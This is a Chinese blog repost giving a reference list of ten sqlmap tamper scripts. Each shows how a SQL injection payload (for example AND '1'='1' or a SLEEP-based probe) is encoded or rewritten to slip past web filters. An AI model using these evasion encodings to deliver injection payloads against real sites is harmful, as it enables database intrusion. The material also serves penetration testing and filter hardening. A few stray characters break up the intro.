大家好我是哥哥不愛吃米飯 喜歡的可以關(guān)注我一下首先這個(gè)文章我是轉(zhuǎn)來的 http://www.chuhades.com/post/19590b_4cc51f 確實(shí)很實(shí)用赃梧,就當(dāng)記錄一下吧畜挨,方便日后查詢谚攒。
(1) apostrophemask.py UTF-8編碼
Example: * Input: AND '1'='1' * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87 (2) apostrophenullencode.py unicode編碼 Example: * Input: AND '1'='1' * Output: AND %00%271%00%27=%00%271%00%27 (3) appendnullbyte.py 添加%00 Example: * Input: AND 1=1 * Output: AND 1=1%00 Requirement: * Microsoft Access (4) base64encode.py base64編碼 Example: * Input: 1' AND SLEEP(5)# * Output: MScgQU5EIFNMRUVQKDUpIw== (5) between.py 以”not between”替換”>“ Example: * Input: 'A > B' * Output: 'A NOT BETWEEN 0 AND B' (6) bluecoat.py 以隨機(jī)的空白字符替代空格,以”like”替代”=“ Example: * Input: SELECT id FROM users where id = 1 * Output: SELECT%09id FROM users where id LIKE 1 Requirement: * MySQL 5.1, SGOS (7) chardoubleencode.py 雙重url編碼 Example: * Input: SELECT FIELD FROM%20TABLE * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545 (8) charencode.py url編碼 Example: * Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 (9) charunicodeencode.py 對未進(jìn)行url編碼的字符進(jìn)行unicode編碼 Example: * Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045' Requirement: * ASP * ASP.NET (10) equaltolike.py 以”like”替代”=“ Example: * Input: SELECT * FROM users WHERE id=1 * Output: SELECT * FROM users WHERE id LIKE 1
未完待續(xù)...
